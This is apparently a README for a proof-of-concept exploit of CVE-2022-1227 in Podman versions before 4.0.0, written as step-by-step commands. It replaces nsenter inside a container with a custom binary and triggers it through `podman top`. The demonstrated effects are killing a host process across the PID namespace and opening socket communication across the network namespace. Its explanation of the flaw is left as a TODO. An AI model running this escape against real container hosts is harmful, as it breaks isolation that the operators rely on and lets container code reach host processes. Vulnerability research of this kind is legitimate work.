A script for exploiting CVE-2022-1227.
- Ubuntu
20.10
is recommanded. - Podman <
4.0.0
;3.4.4
is recommanded.
TODO: add what is the principle of this vulnerability
Follow the instruction in the official document: https://podman.io/getting-started/installation#installing-on-linux
For Ubuntu 20.10
, the imstall command should be:
sudo apt-get install podman=3.4.4+ds1-1ubuntu1
In this section we try a simple PoC to break the bundary of PID namespace
and kill
a process in the host.
Here are the steps:
-
Run a container by the following command:
podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity
-
Run
keep
in./exp/bin
and get thePID
it is running. Usually it will display its PID on the terminal. As the binary are set to sleep for 600 seconds, maybe you must be quick to finish the follow steps.tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep My process ID is: 7719 Put this number to `PID` in the sendsig.c and compile!
-
Edit the source code in
./exp/src/sendsig.c
and fill in the PID obtained in the previous step in variablepid
.int pid = OLD_VAL;
to
int pid = 7719;
-
Put the compiled binary to the internal podman:
podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter
-
Run
podman top
to trigger vulnerability by:podman top -l
-
If everything goes right, the running process
keep
will be killed immediately. This is unusual, because normally processes inside the container cannot send signal to processes on the host due to the PID namespace isolation.tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep My process ID is: 7719 Killed
In this section, we use sockets to realize the inter-process socket communication between the client in the container and the server on the host, which is usually impossible when the isolation mechanism is complete. We use this vulnerability to break through the isolation of net namespace to realize this exploit.
First, enter the directory by cd ./exp
;
By simply running ./exploit.sh
, everything will be done automatically; if everything goes right, the server will display:
Hello from the container!
It means we go across the network namespace and escape.